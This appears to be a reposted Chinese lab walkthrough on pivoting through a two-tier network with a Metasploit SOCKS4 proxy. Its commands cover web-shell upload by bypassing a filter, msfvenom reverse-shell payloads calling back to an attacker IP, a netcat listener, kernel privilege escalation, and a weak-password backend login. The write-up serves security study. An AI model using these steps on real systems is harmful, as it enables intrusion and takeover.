socks4代理网络渗透测试实验

socks4代理网络渗透测试实验实验目的:利用2级代理功能对3层网络进行渗透测试靶机ubantu192.168.31.207192.168.1.129ubantu192.168.1.100192.168.2.10windows2009192.168.2.100192.168.首先访问192.1…

大家好,又见面了,我是你们的朋友全栈君。

            实验目的:利用代理功能对2层网络进行渗透
  测试靶机  ubantu 192.168.31.207  192.168.1.129
                  ubantu  192.168.1.100 

首先访问192.168.31.207
socks4代理网络渗透测试实验
一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将
socks4代理网络渗透测试实验
改为socks4代理网络渗透测试实验
放包就上传成功了
socks4代理网络渗透测试实验
菜刀连接文件地址
socks4代理网络渗透测试实验
kali打开msf控制台,设置模块exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.43
set LPORT 8888
socks4代理网络渗透测试实验利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf
利用菜刀上传php大马,并将生成的elf木马上传到目标机
进入大马进行反弹shell提权
kali本地监听12388端口 nc -lvvp 12388
socks4代理网络渗透测试实验
大马进行反弹shell
socks4代理网络渗透测试实验
反弹成功
socks4代理网络渗透测试实验uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本
gcc shell.c -o shell
./shell
提权成功
socks4代理网络渗透测试实验我们给上传的elf木马权限并执行
chmod 777 1.elf
./elf
socks4代理网络渗透测试实验成功获得一个会话连接
socks4代理网络渗透测试实验添加一个路由 run autoroute -s 192.168.1.0/24
socks4代理网络渗透测试实验
本地设置socks4代理
use auxiliary/server/socks4a
set SRVPORT 9999
开启新的终端 编辑 vim /etc/proxychains.conf
socks4代理网络渗透测试实验将设置的socks4添加进末尾
代理打开firefox
socks4代理网络渗透测试实验
访问192.168.1.100
socks4代理网络渗透测试实验弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3
socks4代理网络渗透测试实验
添加新文章上传php大马
socks4代理网络渗透测试实验直接拖拽成功上传后,可以查看路径,直接访问地址
socks4代理网络渗透测试实验由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了
以上操作仅供大家学习参考使用,

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/147667.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • jdbc自建工具类

    jdbc自建工具类

  • ORA-00937: 不是单组分组函数

    ORA-00937: 不是单组分组函数修改sql语句的时候遇到了这个错误ORA-00937:不是单组分组函数eg:查询人员表中的name、age以及最大age;selectname,age,max(age)fromPerson;此时将会报错ORA-00937:不是单组分组函数—解释意思为:select语句中又在查询某一列的值,其中还有聚合函数。oracle数据库都要疯了。。将上述修改为:se…

  • MyEclipse安装SVN插件详解

    MyEclipse安装SVN插件详解今天弄了一下svn插件,确实不太容易,花了一番功夫才搞定,所以,为了以后不为同样的工作花费时间去学重复的事情,我决定记录一下自己安装SVN插件到MyEclipse的过程。也为苦恼在这事上的朋友提供点资源。首先当然是准备工具咯,svn的插件下载地址:http://www.eclipse.org/subversive/downloads.php#latest_releasesvn-con…

  • sql prompt linux,SQL PROMPT的设置[通俗易懂]

    sql prompt linux,SQL PROMPT的设置[通俗易懂]–10g中一般的SQLPROMPT都是’>’,为了让我们的提示符显示的更有意义,以便我们在做一些操作时可以明确我们所处的位置,采用以下方法,更改我们的SQLPROMPT。SQL>DEFINEDEFINE_DATE=”12-3月-09″(CHAR)DEFINE_CONNECT_IDENTIFIER=”orcl”(CHAR)DEFINE_USE…

  • 什么是MVC三层架构?「建议收藏」

    什么是MVC三层架构?「建议收藏」1.1、什么是MVC MVC是模型(Model)、视图(View)、控制器(Controller)的简写,是一种软件设计规范。 是将业务逻辑、数据、显示分离的方法来组织代码。 MVC主要作用是降低了视图与业务逻辑间的双向偶合。 MVC不是一种设计模式,MVC是一种架构模式。当然不同的MVC存在差异。 Model(模型):数据模型,提供要展示的数据,因此包含数据和行为,可以认为是领域模型或JavaBean组件(包含数据和行为),不过现在一般都分离开来:ValueObj

  • 端口被占用问题

    端口被占用问题

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号